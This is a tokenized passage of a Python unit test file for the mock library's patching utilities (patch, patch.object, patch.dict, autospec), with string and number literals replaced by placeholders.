TestCase ) : <EOL> def assertNotCallable ( self , obj , magic = True ) : <EOL> MockClass = NonCallableMagicMock <EOL> if not magic : <EOL> MockClass = NonCallableMock <EOL> self . assertRaises ( TypeError , obj ) <EOL> self . assertTrue ( is_instance ( obj , MockClass ) ) <EOL> self . assertFalse ( is_instance ( obj , CallableMixin ) ) <EOL> def test_single_patchobject ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> def test ( ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Patched , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_patchobject_with_none ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> @ patch . object ( Something , '<STR_LIT>' , None ) <EOL> def test ( ) : <EOL> self . assertIsNone ( Something . attribute , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_multiple_patchobject ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> next_attribute = sentinel . Original2 <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched2 ) <EOL> def test ( ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Patched , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( Something . next_attribute , sentinel . Patched2 , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( Something . next_attribute , sentinel . Original2 , <EOL> "<STR_LIT>" ) <EOL> def test_object_lookup_is_quite_lazy ( self ) : <EOL> global something <EOL> original = something <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . 
Something2 ) <EOL> def test ( ) : <EOL> pass <EOL> try : <EOL> something = sentinel . replacement_value <EOL> test ( ) <EOL> self . assertEqual ( something , sentinel . replacement_value ) <EOL> finally : <EOL> something = original <EOL> def test_patch ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . Something2 ) <EOL> def test ( ) : <EOL> self . assertEqual ( PTModule . something , sentinel . Something2 , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . Something2 ) <EOL> @ patch ( '<STR_LIT>' % __name__ , sentinel . SomethingElse ) <EOL> def test ( ) : <EOL> self . assertEqual ( PTModule . something , sentinel . Something2 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something_else , sentinel . SomethingElse , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something_else , sentinel . SomethingElse , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something_else , sentinel . SomethingElse , <EOL> "<STR_LIT>" ) <EOL> mock = Mock ( ) <EOL> mock . return_value = sentinel . Handle <EOL> @ patch ( '<STR_LIT>' % builtin_string , mock ) <EOL> def test ( ) : <EOL> self . assertEqual ( open ( '<STR_LIT:filename>' , '<STR_LIT:r>' ) , sentinel . Handle , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> test ( ) <EOL> self . assertNotEqual ( open , mock , "<STR_LIT>" ) <EOL> def test_patch_class_attribute ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , <EOL> sentinel . ClassAttribute ) <EOL> def test ( ) : <EOL> self . assertEqual ( PTModule . SomeClass . class_attribute , <EOL> sentinel . ClassAttribute , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertIsNone ( PTModule . SomeClass . 
class_attribute , <EOL> "<STR_LIT>" ) <EOL> def test_patchobject_with_default_mock ( self ) : <EOL> class Test ( object ) : <EOL> something = sentinel . Original <EOL> something2 = sentinel . Original2 <EOL> @ patch . object ( Test , '<STR_LIT>' ) <EOL> def test ( mock ) : <EOL> self . assertEqual ( mock , Test . something , <EOL> "<STR_LIT>" ) <EOL> self . assertIsInstance ( mock , MagicMock , <EOL> "<STR_LIT>" ) <EOL> test ( ) <EOL> @ patch . object ( Test , '<STR_LIT>' ) <EOL> @ patch . object ( Test , '<STR_LIT>' ) <EOL> def test ( this1 , this2 , mock1 , mock2 ) : <EOL> self . assertEqual ( this1 , sentinel . this1 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( this2 , sentinel . this2 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( mock1 , Test . something2 , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( mock2 , Test . something , <EOL> "<STR_LIT>" ) <EOL> self . assertIsInstance ( mock2 , MagicMock , <EOL> "<STR_LIT>" ) <EOL> self . assertIsInstance ( mock2 , MagicMock , <EOL> "<STR_LIT>" ) <EOL> self . assertNotEqual ( outerMock1 , mock1 , "<STR_LIT>" ) <EOL> self . assertNotEqual ( outerMock2 , mock2 , "<STR_LIT>" ) <EOL> return mock1 , mock2 <EOL> outerMock1 = outerMock2 = None <EOL> outerMock1 , outerMock2 = test ( sentinel . this1 , sentinel . this2 ) <EOL> test ( sentinel . this1 , sentinel . this2 ) <EOL> def test_patch_with_spec ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = SomeClass ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> self . assertTrue ( is_instance ( SomeClass . wibble , MagicMock ) ) <EOL> self . assertRaises ( AttributeError , lambda : SomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patchobject_with_spec ( self ) : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , spec = SomeClass ) <EOL> def test ( MockAttribute ) : <EOL> self . assertEqual ( SomeClass . class_attribute , MockAttribute ) <EOL> self . assertTrue ( is_instance ( SomeClass . class_attribute . 
wibble , <EOL> MagicMock ) ) <EOL> self . assertRaises ( AttributeError , <EOL> lambda : SomeClass . class_attribute . not_wibble ) <EOL> test ( ) <EOL> def test_patch_with_spec_as_list ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = [ '<STR_LIT>' ] ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> self . assertTrue ( is_instance ( SomeClass . wibble , MagicMock ) ) <EOL> self . assertRaises ( AttributeError , lambda : SomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patchobject_with_spec_as_list ( self ) : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , spec = [ '<STR_LIT>' ] ) <EOL> def test ( MockAttribute ) : <EOL> self . assertEqual ( SomeClass . class_attribute , MockAttribute ) <EOL> self . assertTrue ( is_instance ( SomeClass . class_attribute . wibble , <EOL> MagicMock ) ) <EOL> self . assertRaises ( AttributeError , <EOL> lambda : SomeClass . class_attribute . not_wibble ) <EOL> test ( ) <EOL> def test_nested_patch_with_spec_as_list ( self ) : <EOL> @ patch ( '<STR_LIT>' % builtin_string ) <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = [ '<STR_LIT>' ] ) <EOL> def test ( MockSomeClass , MockOpen ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> self . assertTrue ( is_instance ( SomeClass . wibble , MagicMock ) ) <EOL> self . assertRaises ( AttributeError , lambda : SomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patch_with_spec_as_boolean ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = True ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> MockSomeClass . wibble <EOL> self . assertRaises ( AttributeError , lambda : MockSomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patch_object_with_spec_as_boolean ( self ) : <EOL> @ patch . object ( PTModule , '<STR_LIT>' , spec = True ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertEqual ( SomeClass , MockSomeClass ) <EOL> MockSomeClass . wibble <EOL> self . 
assertRaises ( AttributeError , lambda : MockSomeClass . not_wibble ) <EOL> test ( ) <EOL> def test_patch_class_acts_with_spec_is_inherited ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec = True ) <EOL> def test ( MockSomeClass ) : <EOL> self . assertTrue ( is_instance ( MockSomeClass , MagicMock ) ) <EOL> instance = MockSomeClass ( ) <EOL> self . assertNotCallable ( instance ) <EOL> instance . wibble <EOL> self . assertRaises ( AttributeError , lambda : instance . not_wibble ) <EOL> test ( ) <EOL> def test_patch_with_create_mocks_non_existent_attributes ( self ) : <EOL> @ patch ( '<STR_LIT>' % builtin_string , sentinel . Frooble , create = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( frooble , sentinel . Frooble ) <EOL> test ( ) <EOL> self . assertRaises ( NameError , lambda : frooble ) <EOL> def test_patchobject_with_create_mocks_non_existent_attributes ( self ) : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , sentinel . Frooble , create = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( SomeClass . frooble , sentinel . Frooble ) <EOL> test ( ) <EOL> self . assertFalse ( hasattr ( SomeClass , '<STR_LIT>' ) ) <EOL> def test_patch_wont_create_by_default ( self ) : <EOL> try : <EOL> @ patch ( '<STR_LIT>' % builtin_string , sentinel . Frooble ) <EOL> def test ( ) : <EOL> self . assertEqual ( frooble , sentinel . Frooble ) <EOL> test ( ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertRaises ( NameError , lambda : frooble ) <EOL> def test_patchobject_wont_create_by_default ( self ) : <EOL> try : <EOL> @ patch . object ( SomeClass , '<STR_LIT>' , sentinel . Frooble ) <EOL> def test ( ) : <EOL> self . fail ( '<STR_LIT>' ) <EOL> test ( ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . 
assertFalse ( hasattr ( SomeClass , '<STR_LIT>' ) ) <EOL> def test_patch_builtins_without_create ( self ) : <EOL> @ patch ( __name__ + '<STR_LIT>' ) <EOL> def test_ord ( mock_ord ) : <EOL> mock_ord . return_value = <NUM_LIT> <EOL> return ord ( '<STR_LIT:c>' ) <EOL> @ patch ( __name__ + '<STR_LIT>' ) <EOL> def test_open ( mock_open ) : <EOL> m = mock_open . return_value <EOL> m . read . return_value = '<STR_LIT>' <EOL> fobj = open ( '<STR_LIT>' ) <EOL> data = fobj . read ( ) <EOL> fobj . close ( ) <EOL> return data <EOL> self . assertEqual ( test_ord ( ) , <NUM_LIT> ) <EOL> self . assertEqual ( test_open ( ) , '<STR_LIT>' ) <EOL> def test_patch_with_static_methods ( self ) : <EOL> class Foo ( object ) : <EOL> @ staticmethod <EOL> def woot ( ) : <EOL> return sentinel . Static <EOL> @ patch . object ( Foo , '<STR_LIT>' , staticmethod ( lambda : sentinel . Patched ) ) <EOL> def anonymous ( ) : <EOL> self . assertEqual ( Foo . woot ( ) , sentinel . Patched ) <EOL> anonymous ( ) <EOL> self . assertEqual ( Foo . woot ( ) , sentinel . Static ) <EOL> def test_patch_local ( self ) : <EOL> foo = sentinel . Foo <EOL> @ patch . object ( sentinel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def anonymous ( ) : <EOL> self . assertEqual ( sentinel . Foo , '<STR_LIT>' ) <EOL> anonymous ( ) <EOL> self . assertEqual ( sentinel . Foo , foo ) <EOL> def test_patch_slots ( self ) : <EOL> class Foo ( object ) : <EOL> __slots__ = ( '<STR_LIT>' , ) <EOL> foo = Foo ( ) <EOL> foo . Foo = sentinel . Foo <EOL> @ patch . object ( foo , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def anonymous ( ) : <EOL> self . assertEqual ( foo . Foo , '<STR_LIT>' ) <EOL> anonymous ( ) <EOL> self . assertEqual ( foo . Foo , sentinel . Foo ) <EOL> def test_patchobject_class_decorator ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> class Foo ( object ) : <EOL> def test_method ( other_self ) : <EOL> self . assertEqual ( Something . attribute , sentinel . 
Patched , <EOL> "<STR_LIT>" ) <EOL> def not_test_method ( other_self ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> Foo = patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) ( Foo ) <EOL> f = Foo ( ) <EOL> f . test_method ( ) <EOL> f . not_test_method ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_patch_class_decorator ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> class Foo ( object ) : <EOL> def test_method ( other_self , mock_something ) : <EOL> self . assertEqual ( PTModule . something , mock_something , <EOL> "<STR_LIT>" ) <EOL> def not_test_method ( other_self ) : <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> Foo = patch ( '<STR_LIT>' % __name__ ) ( Foo ) <EOL> f = Foo ( ) <EOL> f . test_method ( ) <EOL> f . not_test_method ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( PTModule . something , sentinel . Something , <EOL> "<STR_LIT>" ) <EOL> def test_patchobject_twice ( self ) : <EOL> class Something ( object ) : <EOL> attribute = sentinel . Original <EOL> next_attribute = sentinel . Original2 <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> @ patch . object ( Something , '<STR_LIT>' , sentinel . Patched ) <EOL> def test ( ) : <EOL> self . assertEqual ( Something . attribute , sentinel . Patched , "<STR_LIT>" ) <EOL> test ( ) <EOL> self . assertEqual ( Something . attribute , sentinel . Original , <EOL> "<STR_LIT>" ) <EOL> def test_patch_dict ( self ) : <EOL> foo = { '<STR_LIT>' : object ( ) , '<STR_LIT>' : '<STR_LIT>' } <EOL> original = foo . copy ( ) <EOL> @ patch . 
dict ( foo ) <EOL> def test ( ) : <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> del foo [ '<STR_LIT>' ] <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> def test ( ) : <EOL> self . assertEqual ( len ( foo ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( foo [ '<STR_LIT:a>' ] , '<STR_LIT:b>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] ) <EOL> def test ( ) : <EOL> self . assertEqual ( len ( foo ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( foo [ '<STR_LIT:a>' ] , '<STR_LIT:b>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> def test_patch_dict_with_container_object ( self ) : <EOL> foo = Container ( ) <EOL> foo [ '<STR_LIT>' ] = object ( ) <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> original = foo . values . copy ( ) <EOL> @ patch . dict ( foo ) <EOL> def test ( ) : <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> del foo [ '<STR_LIT>' ] <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> def test ( ) : <EOL> self . assertEqual ( len ( foo . values ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( foo [ '<STR_LIT:a>' ] , '<STR_LIT:b>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> def test_patch_dict_with_clear ( self ) : <EOL> foo = { '<STR_LIT>' : object ( ) , '<STR_LIT>' : '<STR_LIT>' } <EOL> original = foo . copy ( ) <EOL> @ patch . dict ( foo , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo , { } ) <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } , clear = True ) <EOL> def test ( ) : <EOL> self . 
assertEqual ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> @ patch . dict ( foo , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> test ( ) <EOL> self . assertEqual ( foo , original ) <EOL> def test_patch_dict_with_container_object_and_clear ( self ) : <EOL> foo = Container ( ) <EOL> foo [ '<STR_LIT>' ] = object ( ) <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> original = foo . values . copy ( ) <EOL> @ patch . dict ( foo , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo . values , { } ) <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo . values , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> def test_name_preserved ( self ) : <EOL> foo = { } <EOL> @ patch ( '<STR_LIT>' % __name__ , object ( ) ) <EOL> @ patch ( '<STR_LIT>' % __name__ , object ( ) , autospec = True ) <EOL> @ patch . object ( SomeClass , object ( ) ) <EOL> @ patch . dict ( foo ) <EOL> def some_name ( ) : <EOL> pass <EOL> self . assertEqual ( some_name . __name__ , '<STR_LIT>' ) <EOL> def test_patch_with_exception ( self ) : <EOL> foo = { } <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> def test ( ) : <EOL> raise NameError ( '<STR_LIT>' ) <EOL> try : <EOL> test ( ) <EOL> except NameError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertEqual ( foo , { } ) <EOL> def test_patch_dict_with_string ( self ) : <EOL> @ patch . dict ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test ( ) : <EOL> self . assertIn ( '<STR_LIT>' , os . environ ) <EOL> test ( ) <EOL> @ unittest . 
expectedFailure <EOL> def test_patch_descriptor ( self ) : <EOL> class Nothing ( object ) : <EOL> foo = None <EOL> class Something ( object ) : <EOL> foo = { } <EOL> @ patch . object ( Nothing , '<STR_LIT:foo>' , <NUM_LIT:2> ) <EOL> @ classmethod <EOL> def klass ( cls ) : <EOL> self . assertIs ( cls , Something ) <EOL> @ patch . object ( Nothing , '<STR_LIT:foo>' , <NUM_LIT:2> ) <EOL> @ staticmethod <EOL> def static ( arg ) : <EOL> return arg <EOL> @ patch . dict ( foo ) <EOL> @ classmethod <EOL> def klass_dict ( cls ) : <EOL> self . assertIs ( cls , Something ) <EOL> @ patch . dict ( foo ) <EOL> @ staticmethod <EOL> def static_dict ( arg ) : <EOL> return arg <EOL> self . assertEqual ( Something . static ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> Something . klass ( ) <EOL> self . assertEqual ( Something . static_dict ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> Something . klass_dict ( ) <EOL> something = Something ( ) <EOL> self . assertEqual ( something . static ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> something . klass ( ) <EOL> self . assertEqual ( something . static_dict ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> something . klass_dict ( ) <EOL> def test_patch_spec_set ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec_set = SomeClass ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> @ patch . object ( support , '<STR_LIT>' , spec_set = SomeClass ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> @ patch ( '<STR_LIT>' % __name__ , spec_set = True ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> @ patch . object ( support , '<STR_LIT>' , spec_set = True ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . 
assertRaises ( AttributeError , test ) <EOL> def test_spec_set_inherit ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec_set = True ) <EOL> def test ( MockClass ) : <EOL> instance = MockClass ( ) <EOL> instance . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> def test_patch_start_stop ( self ) : <EOL> original = something <EOL> patcher = patch ( '<STR_LIT>' % __name__ ) <EOL> self . assertIs ( something , original ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIsNot ( mock , original ) <EOL> self . assertIs ( something , mock ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertIs ( something , original ) <EOL> def test_stop_without_start ( self ) : <EOL> patcher = patch ( foo_name , '<STR_LIT:bar>' , <NUM_LIT:3> ) <EOL> self . assertRaises ( RuntimeError , patcher . stop ) <EOL> def test_patchobject_start_stop ( self ) : <EOL> original = something <EOL> patcher = patch . object ( PTModule , '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> self . assertIs ( something , original ) <EOL> replaced = patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( replaced , '<STR_LIT:foo>' ) <EOL> self . assertIs ( something , replaced ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertIs ( something , original ) <EOL> def test_patch_dict_start_stop ( self ) : <EOL> d = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> original = d . copy ( ) <EOL> patcher = patch . dict ( d , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , clear = True ) <EOL> self . assertEqual ( d , original ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( d , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertEqual ( d , original ) <EOL> def test_patch_dict_class_decorator ( self ) : <EOL> this = self <EOL> d = { '<STR_LIT>' : '<STR_LIT>' } <EOL> original = d . copy ( ) <EOL> class Test ( object ) : <EOL> def test_first ( self ) : <EOL> this . 
assertEqual ( d , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_second ( self ) : <EOL> this . assertEqual ( d , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> Test = patch . dict ( d , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , clear = True ) ( Test ) <EOL> self . assertEqual ( d , original ) <EOL> test = Test ( ) <EOL> test . test_first ( ) <EOL> self . assertEqual ( d , original ) <EOL> test . test_second ( ) <EOL> self . assertEqual ( d , original ) <EOL> test = Test ( ) <EOL> test . test_first ( ) <EOL> self . assertEqual ( d , original ) <EOL> test . test_second ( ) <EOL> self . assertEqual ( d , original ) <EOL> def test_get_only_proxy ( self ) : <EOL> class Something ( object ) : <EOL> foo = '<STR_LIT:foo>' <EOL> class SomethingElse : <EOL> foo = '<STR_LIT:foo>' <EOL> for thing in Something , SomethingElse , Something ( ) , SomethingElse : <EOL> proxy = _get_proxy ( thing ) <EOL> @ patch . object ( proxy , '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> def test ( ) : <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:bar>' ) <EOL> test ( ) <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( thing . foo , '<STR_LIT:foo>' ) <EOL> self . assertNotIn ( '<STR_LIT:foo>' , proxy . __dict__ ) <EOL> def test_get_set_delete_proxy ( self ) : <EOL> class Something ( object ) : <EOL> foo = '<STR_LIT:foo>' <EOL> class SomethingElse : <EOL> foo = '<STR_LIT:foo>' <EOL> for thing in Something , SomethingElse , Something ( ) , SomethingElse : <EOL> proxy = _get_proxy ( Something , get_only = False ) <EOL> @ patch . object ( proxy , '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> def test ( ) : <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:bar>' ) <EOL> test ( ) <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( thing . foo , '<STR_LIT:foo>' ) <EOL> self . assertNotIn ( '<STR_LIT:foo>' , proxy . 
__dict__ ) <EOL> def test_patch_keyword_args ( self ) : <EOL> kwargs = { '<STR_LIT>' : KeyError , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:foo>' : MagicMock ( ) } <EOL> patcher = patch ( foo_name , ** kwargs ) <EOL> mock = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertRaises ( KeyError , mock ) <EOL> self . assertEqual ( mock . foo . bar ( ) , <NUM_LIT> ) <EOL> self . assertIsInstance ( mock . foo , MagicMock ) <EOL> def test_patch_object_keyword_args ( self ) : <EOL> kwargs = { '<STR_LIT>' : KeyError , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:foo>' : MagicMock ( ) } <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , ** kwargs ) <EOL> mock = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertRaises ( KeyError , mock ) <EOL> self . assertEqual ( mock . foo . bar ( ) , <NUM_LIT> ) <EOL> self . assertIsInstance ( mock . foo , MagicMock ) <EOL> def test_patch_dict_keyword_args ( self ) : <EOL> original = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> copy = original . copy ( ) <EOL> patcher = patch . dict ( original , foo = <NUM_LIT:3> , bar = <NUM_LIT:4> , baz = <NUM_LIT:5> ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( original , dict ( foo = <NUM_LIT:3> , bar = <NUM_LIT:4> , baz = <NUM_LIT:5> ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertEqual ( original , copy ) <EOL> def test_autospec ( self ) : <EOL> class Boo ( object ) : <EOL> def __init__ ( self , a ) : <EOL> pass <EOL> def f ( self , a ) : <EOL> pass <EOL> def g ( self ) : <EOL> pass <EOL> foo = '<STR_LIT:bar>' <EOL> class Bar ( object ) : <EOL> def a ( self ) : <EOL> pass <EOL> def _test ( mock ) : <EOL> mock ( <NUM_LIT:1> ) <EOL> mock . assert_called_with ( <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , mock ) <EOL> def _test2 ( mock ) : <EOL> mock . f ( <NUM_LIT:1> ) <EOL> mock . f . assert_called_with ( <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , mock . f ) <EOL> mock . g ( ) <EOL> mock . g . 
assert_called_with ( ) <EOL> self . assertRaises ( TypeError , mock . g , <NUM_LIT:1> ) <EOL> self . assertRaises ( AttributeError , getattr , mock , '<STR_LIT:h>' ) <EOL> mock . foo . lower ( ) <EOL> mock . foo . lower . assert_called_with ( ) <EOL> self . assertRaises ( AttributeError , getattr , mock . foo , '<STR_LIT:bar>' ) <EOL> mock . Bar ( ) <EOL> mock . Bar . assert_called_with ( ) <EOL> mock . Bar . a ( ) <EOL> mock . Bar . a . assert_called_with ( ) <EOL> self . assertRaises ( TypeError , mock . Bar . a , <NUM_LIT:1> ) <EOL> mock . Bar ( ) . a ( ) <EOL> mock . Bar ( ) . a . assert_called_with ( ) <EOL> self . assertRaises ( TypeError , mock . Bar ( ) . a , <NUM_LIT:1> ) <EOL> self . assertRaises ( AttributeError , getattr , mock . Bar , '<STR_LIT:b>' ) <EOL> self . assertRaises ( AttributeError , getattr , mock . Bar ( ) , '<STR_LIT:b>' ) <EOL> def function ( mock ) : <EOL> _test ( mock ) <EOL> _test2 ( mock ) <EOL> _test2 ( mock ( <NUM_LIT:1> ) ) <EOL> self . assertIs ( mock , Foo ) <EOL> return mock <EOL> test = patch ( foo_name , autospec = True ) ( function ) <EOL> mock = test ( ) <EOL> self . assertIsNot ( Foo , mock ) <EOL> test ( ) <EOL> module = sys . modules [ __name__ ] <EOL> test = patch . object ( module , '<STR_LIT>' , autospec = True ) ( function ) <EOL> mock = test ( ) <EOL> self . assertIsNot ( Foo , mock ) <EOL> test ( ) <EOL> def test_autospec_function ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , autospec = True ) <EOL> def test ( mock ) : <EOL> function ( <NUM_LIT:1> ) <EOL> function . assert_called_with ( <NUM_LIT:1> ) <EOL> function ( <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> function . assert_called_with ( <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> self . assertRaises ( TypeError , function ) <EOL> self . 
